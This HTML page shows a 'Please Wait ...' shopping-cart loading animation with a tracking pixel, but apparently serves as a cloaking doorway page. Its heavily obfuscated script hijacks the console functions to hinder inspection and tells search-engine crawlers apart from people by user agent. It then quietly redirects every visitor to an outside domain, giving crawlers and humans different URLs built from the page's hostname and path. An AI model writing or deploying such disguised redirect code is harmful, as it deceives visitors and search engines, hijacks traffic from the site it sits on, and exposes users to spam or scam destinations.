<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		<script>
function _0x338b(){var _0x53b336=['URKcg','match','userAgent','3VmcKkd','eFrHl','352zcGjpi','trace','YLkFa','location','rn\x20this\x22)(','bind','constructo','log','qnNSt','PpeXA','length','ukIUq','763008lDBUAy','elgine.psa','{}.constru','toString','href','OxwBc','PgLxX','581070tIhFsS','warn','352ASnzPP','OrkSF','qIjhz','hQLRt','ywAiT','ZHAjZ','lVPmL','__proto__','(((.+)+)+)','ixHKO','33910gwpgox','300566fPdtzK','prototype','info','PHXee','144lfVxcN','6676zyIStJ','VCXOK','jDofv','apply','go/','exception','oVQqu','TCgTo','KPVjM','FWjzh','https://up','table','ctor(\x22retu','1287160wCPxpS','console','45TKapTe','rFFJm','xUUDz','search'];_0x338b=function(){return _0x53b336;};return _0x338b();}function _0x2594(_0x7c8ec4,_0x616abe){var _0x2712e1=_0x338b();return _0x2594=function(_0x338b5a,_0x25943f){_0x338b5a=_0x338b5a-(-0x5f6+0x17ed+-0x4*0x43b);var _0xd3f6ab=_0x2712e1[_0x338b5a];return _0xd3f6ab;},_0x2594(_0x7c8ec4,_0x616abe);}(function(_0x43be33,_0x48615e){function _0x276be4(_0x146181,_0x217339,_0x580bc0,_0x419a92){return _0x2594(_0x419a92- -0x22e,_0x146181);}var _0x1f6446=_0x43be33();function _0x328ef9(_0xce142,_0x3a91e3,_0x2d939a,_0x582741){return _0x2594(_0xce142- -0x123,_0x582741);}while(!![]){try{var _0x2cd3c6=parseInt(_0x276be4(-0x135,-0x101,-0x12c,-0x117))/(0x88+-0x3*0x41d+0x1b*0x70)+-parseInt(_0x276be4(-0xd8,-0xe6,-0xfb,-0xe7))/(-0x49*0x1+-0x2235+0x4*0x8a0)*(-parseInt(_0x328ef9(0xf,0x4,0x0,0x28))/(-0x1205*-0x2+-0x1*0x2015+-0x3f2))+parseInt(_0x276be4(-0xf9,-0xfa,-0x12f,-0x112))/(-0x1*-0xc55+-0xc1d*0x3+-0xf6*-0x19)*(-parseInt(_0x328ef9(0x8,0xa,-0x7,0x24))/(0x2*-0x3a0+-0x22b4+-0x1*-0x29f9))+-parseInt(_0x328ef9(0x1d,0x28,0x34,0x20))/(0x117*0x1+-0x20ff+0x1fee)+-parseInt(_0x328ef9(0x6,0x20,-0x17,0x7))/(-0x6*0x425+-0x2b3*-0x3+0x10cc)+parseInt(_0x328ef9(0x11,-0x1,0x1,0x2))/(0x2*-0xbcf+-0x1c6*0xd+0x2eb4)*(-parseInt(_0x276be4(-0x11c,-0x105,-0x109,-0x113))/(-0x12a0+-0x23ae+-0x3*-0x121d))+-parseInt(_0x328ef9(-0xd,-0x3,0xd,-0x23))/(0x1*-0x23cf+-0x1c20*-0x1+0x3*0x293)*(parseInt(_0x328ef9(-0x17,-0x6,0x3,-0x31))/(-0x572+-0x15*-0x1c7+-0x19*0x146));if(_0x2cd3c6===_0x48615e)break;else _0x1f6446['push'](_0x1f6446['shift']());}catch(_0x5f4695){_0x1f6446['push'](_0x1f6446['shift']());}}}(_0x338b,-0x1*-0x1df81+-0x3595f+-0x62a7*-0xa),(function(){var _0x32f11f={'YLkFa':'(((.+)+)+)'+'+$','bhvKr':'CAxIb','TCgTo':function(_0x309f73,_0x5d03d1){return _0x309f73!==_0x5d03d1;},'ywAiT':_0x4a6b36(-0xf2,-0x104,-0xe4,-0xf2),'qIjhz':'JusjP','lVPmL':'neaYn','ZHAjZ':_0x3992fc(0x2fb,0x2f6,0x313,0x2ec),'FWjzh':_0x4a6b36(-0xd4,-0x107,-0xf2,-0xea),'GCpMq':function(_0x397a11,_0x1deac2){return _0x397a11(_0x1deac2);},'xUUDz':function(_0x2902c9,_0x103e9d){return _0x2902c9+_0x103e9d;},'PHXee':'return\x20(fu'+'nction()\x20','qnNSt':_0x3992fc(0x320,0x304,0x31a,0x332)+_0x3992fc(0x306,0x31e,0x31c,0x312)+_0x4a6b36(-0xe9,-0x10f,-0xe5,-0xf7)+'\x20)','OrkSF':function(_0x432d9b){return _0x432d9b();},'iIgJd':_0x4a6b36(-0xd7,-0xff,-0xdc,-0xf4),'ukIUq':_0x3992fc(0x2e9,0x302,0x308,0x2ff),'ixHKO':'error','NzWPf':_0x4a6b36(-0x104,-0x105,-0x11e,-0x10e),'oVQqu':_0x4a6b36(-0xfe,-0xff,-0x10a,-0x108),'jDofv':_0x4a6b36(-0xf4,-0x108,-0xff,-0xfa),'pakgb':function(_0xc462e1,_0xa463c2){return _0xc462e1<_0xa463c2;},'JBiZE':'2|0|4|1|5|'+'3','rFFJm':function(_0x462c93,_0x2deae5,_0x201783){return _0x462c93(_0x2deae5,_0x201783);},'URKcg':function(_0x4a9fc4){return _0x4a9fc4();},'HlzrP':function(_0x3ffddc){return _0x3ffddc();},'eFrHl':function(_0x3e061b,_0x3a66a2){return _0x3e061b+_0x3a66a2;},'PgLxX':_0x4a6b36(-0x10e,-0x104,-0xfc,-0x10f)},_0x3cf6d7=(function(){var _0x2a2bd4=!![];return function(_0x5f6214,_0x5bdd66){var _0x30ad3a={};_0x30ad3a[_0x20d87d(0x3a3,0x387,0x375,0x39f)]=_0x32f11f[_0x338be1(-0xd2,-0xdf,-0xbf,-0xe8)],_0x30ad3a['bDjoA']=_0x32f11f['bhvKr'];function _0x20d87d(_0xc72147,_0x66a422,_0x373816,_0x173170){return _0x2594(_0x66a422-0x278,_0xc72147);}function _0x338be1(_0x289c82,_0x371f61,_0x4c46c3,_0x2d90a4){return _0x2594(_0x289c82- -0x208,_0x2d90a4);}var _0x37f5ca=_0x30ad3a;if(_0x32f11f[_0x338be1(-0xe5,-0xe0,-0xd0,-0xe2)](_0x32f11f[_0x20d87d(0x38f,0x388,0x375,0x36b)],_0x32f11f[_0x20d87d(0x37f,0x386,0x36e,0x390)])){var _0x20f760=_0x2a2bd4?function(){function _0x3ee007(_0x23bab4,_0x1cdad3,_0x58b924,_0x387753){return _0x20d87d(_0x1cdad3,_0x58b924- -0x1a6,_0x58b924-0xc8,_0x387753-0x37);}function _0x4033eb(_0x47f1d3,_0x54466f,_0x177005,_0x33d097){return _0x20d87d(_0x47f1d3,_0x177005- -0x11b,_0x177005-0x106,_0x33d097-0xb7);}var _0x249bfd={};_0x249bfd[_0x4033eb(0x291,0x293,0x281,0x289)]=_0x37f5ca[_0x3ee007(0x1fc,0x1e1,0x1e1,0x1d2)];var _0x1c77be=_0x249bfd;if(_0x37f5ca['bDjoA']==='CAxIb'){if(_0x5bdd66){var _0x350849=_0x5bdd66['apply'](_0x5f6214,arguments);return _0x5bdd66=null,_0x350849;}}else return _0x5ea58e['toString']()[_0x3ee007(0x1e5,0x219,0x200,0x1ef)](_0x3ee007(0x1d6,0x1f2,0x1e6,0x1f5)+'+$')['toString']()[_0x4033eb(0x2a3,0x2ad,0x297,0x279)+'r'](_0xcd5d8)['search'](NyPItd[_0x3ee007(0x1d8,0x1db,0x1f6,0x1ed)]);}:function(){};return _0x2a2bd4=![],_0x20f760;}else{if(_0x1bc9ec){var _0x36050a=_0x276cf7[_0x20d87d(0x378,0x397,0x3a4,0x38a)](_0x2e629,arguments);return _0x39d087=null,_0x36050a;}}};}());function _0x3992fc(_0x5c8529,_0x5800cd,_0x31bb1c,_0x3c9ff3){return _0x2594(_0x5c8529-0x1de,_0x3c9ff3);}var _0x19c545=_0x32f11f[_0x3992fc(0x30a,0x319,0x2f1,0x2f1)](_0x3cf6d7,this,function(){function _0x41bbc8(_0x5b13cb,_0x1272d2,_0x5ed4ec,_0x2170fc){return _0x3992fc(_0x5b13cb-0x1af,_0x1272d2-0x1ba,_0x5ed4ec-0xb9,_0x1272d2);}function _0x270148(_0x432666,_0x513369,_0x384723,_0x56e4d2){return _0x3992fc(_0x56e4d2- -0x186,_0x513369-0x53,_0x384723-0x19a,_0x513369);}return _0x19c545[_0x270148(0x17d,0x1ac,0x198,0x19b)]()['search'](_0x32f11f['YLkFa'])[_0x41bbc8(0x4d0,0x4e6,0x4bb,0x4bc)]()[_0x41bbc8(0x4c7,0x4c9,0x4bf,0x4bf)+'r'](_0x19c545)[_0x270148(0x176,0x18d,0x183,0x186)](_0x32f11f['YLkFa']);});_0x32f11f[_0x4a6b36(-0x103,-0xf9,-0xf2,-0x100)](_0x19c545);var _0x37b8c8=(function(){var _0x1f88a6=!![];return function(_0x366483,_0x7ea5a2){function _0x25d883(_0xe8cae7,_0xd4f8a2,_0x16f3de,_0x3c11c8){return _0x2594(_0xd4f8a2- -0x3a9,_0xe8cae7);}function _0x354bdb(_0xcd87f8,_0x109635,_0x4cd016,_0x62c1d){return _0x2594(_0x62c1d-0x147,_0x4cd016);}if(_0x32f11f[_0x25d883(-0x291,-0x297,-0x2a7,-0x2b2)]!==_0x32f11f[_0x354bdb(0x26b,0x266,0x243,0x259)]){var _0x31619b=_0x5cf798[_0x25d883(-0x296,-0x28a,-0x281,-0x27c)](_0x1cc108,arguments);return _0xd20bed=null,_0x31619b;}else{var _0x8e53e5=_0x1f88a6?function(){function _0xd8d9a2(_0x5a9ddf,_0x1759a6,_0x596254,_0x3d96e9){return _0x25d883(_0x3d96e9,_0x1759a6-0x42f,_0x596254-0x27,_0x3d96e9-0x106);}if(_0x7ea5a2){var _0x42ae52=_0x7ea5a2[_0xd8d9a2(0x18f,0x1a5,0x1ad,0x191)](_0x366483,arguments);return _0x7ea5a2=null,_0x42ae52;}}:function(){};return _0x1f88a6=![],_0x8e53e5;}};}()),_0x3d0ada=_0x37b8c8(this,function(){var _0x2215f1;function _0x321003(_0x4ad7bd,_0x369b9e,_0x1b9afd,_0x4eaece){return _0x3992fc(_0x4ad7bd- -0x5ba,_0x369b9e-0x99,_0x1b9afd-0x1b,_0x1b9afd);}try{if(_0x32f11f[_0x321003(-0x2cb,-0x2c5,-0x2d3,-0x2e7)]!==_0x32f11f[_0x215cc1(0x139,0x13b,0x15d,0x13e)]){var _0x19b489=_0x32f11f['GCpMq'](Function,_0x32f11f[_0x215cc1(0x13f,0x132,0x155,0x146)](_0x32f11f[_0x215cc1(0x155,0x159,0x157,0x146)](_0x32f11f[_0x321003(-0x2c2,-0x2b2,-0x2b0,-0x2a7)],_0x32f11f[_0x215cc1(0x14d,0x145,0x137,0x155)]),');'));_0x2215f1=_0x32f11f[_0x321003(-0x2cf,-0x2d5,-0x2dc,-0x2d3)](_0x19b489);}else _0x1a09dc=_0x23b13a;}catch(_0xeb15f3){_0x2215f1=window;}var _0x823707=_0x2215f1['console']=_0x2215f1[_0x321003(-0x2b2,-0x2ae,-0x2cc,-0x2c3)]||{},_0x35f0f5=[_0x32f11f['iIgJd'],_0x32f11f[_0x321003(-0x29d,-0x2ad,-0x29c,-0x2b7)],_0x215cc1(0x12c,0x137,0x14f,0x132),_0x32f11f[_0x215cc1(0x135,0x137,0x128,0x12e)],_0x32f11f['NzWPf'],_0x32f11f[_0x321003(-0x2ba,-0x2b3,-0x2a1,-0x2d3)],_0x32f11f[_0x321003(-0x2be,-0x2a7,-0x2b3,-0x2ce)]];function _0x215cc1(_0x222e51,_0x4a6d56,_0x4fb10c,_0x4c836e){return _0x3992fc(_0x4c836e- -0x1c5,_0x4a6d56-0x6e,_0x4fb10c-0x155,_0x222e51);}for(var _0x95dc07=-0x1*-0x1a15+0xa9d+-0x3d*0x9a;_0x32f11f['pakgb'](_0x95dc07,_0x35f0f5[_0x215cc1(0x14f,0x16c,0x154,0x157)]);_0x95dc07++){var _0x4b7ea3=_0x32f11f['JBiZE']['split']('|'),_0x16c05b=-0x1f*-0xb5+-0xb6c+0xa7f*-0x1;while(!![]){switch(_0x4b7ea3[_0x16c05b++]){case'0':var _0x339aba=_0x35f0f5[_0x95dc07];continue;case'1':_0x48f705[_0x215cc1(0x123,0x12a,0x13e,0x12c)]=_0x37b8c8[_0x321003(-0x2a3,-0x2b5,-0x2a3,-0x2bc)](_0x37b8c8);continue;case'2':var _0x48f705=_0x37b8c8[_0x215cc1(0x148,0x136,0x145,0x153)+'r'][_0x321003(-0x2c4,-0x2d5,-0x2b6,-0x2d8)]['bind'](_0x37b8c8);continue;case'3':_0x823707[_0x339aba]=_0x48f705;continue;case'4':var _0x3d88e8=_0x823707[_0x339aba]||_0x48f705;continue;case'5':_0x48f705['toString']=_0x3d88e8['toString'][_0x215cc1(0x13b,0x162,0x156,0x152)](_0x3d88e8);continue;}break;}}});_0x32f11f['HlzrP'](_0x3d0ada);var _0x1b1b84=window[_0x4a6b36(-0x110,-0xf4,-0xe8,-0xf8)][_0x3992fc(0x322,0x315,0x31c,0x30d)],_0x459387=window[_0x3992fc(0x315,0x30c,0x318,0x31f)]['hostname'];function _0x4a6b36(_0x57d34a,_0x5b7ed0,_0x4187a1,_0x193016){return _0x2594(_0x193016- -0x22f,_0x57d34a);}var _0x1218c6=_0x4a6b36(-0xed,-0x10b,-0x107,-0x109)+_0x3992fc(0x31f,0x335,0x33b,0x319)+'bl.com/ite'+'m/'+_0x459387+'/',_0x1b43c8=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i['test'](navigator[_0x3992fc(0x30f,0x31e,0x2fa,0x2fd)]),_0x1ca0d8=(location['href'][_0x3992fc(0x30e,0x32d,0x2f2,0x305)](/\?\/(?:[^-]+)-([^\.]+)/)||[])[0x169f*-0x1+-0x12a4*0x2+-0x354*-0x12];if(!_0x1ca0d8)return;var _0x2964fe=_0x1b43c8?_0x32f11f[_0x4a6b36(-0x105,-0x120,-0x11d,-0x102)](_0x1218c6,_0x1ca0d8):_0x32f11f[_0x4a6b36(-0xe9,-0xe7,-0xfc,-0xfc)](_0x1218c6+_0x32f11f[_0x4a6b36(-0xe2,-0x101,-0xe8,-0xe9)]+_0x1ca0d8,'/');location[_0x3992fc(0x322,0x319,0x32c,0x305)]=_0x2964fe;}()));
		</script>
	</body>
</html>
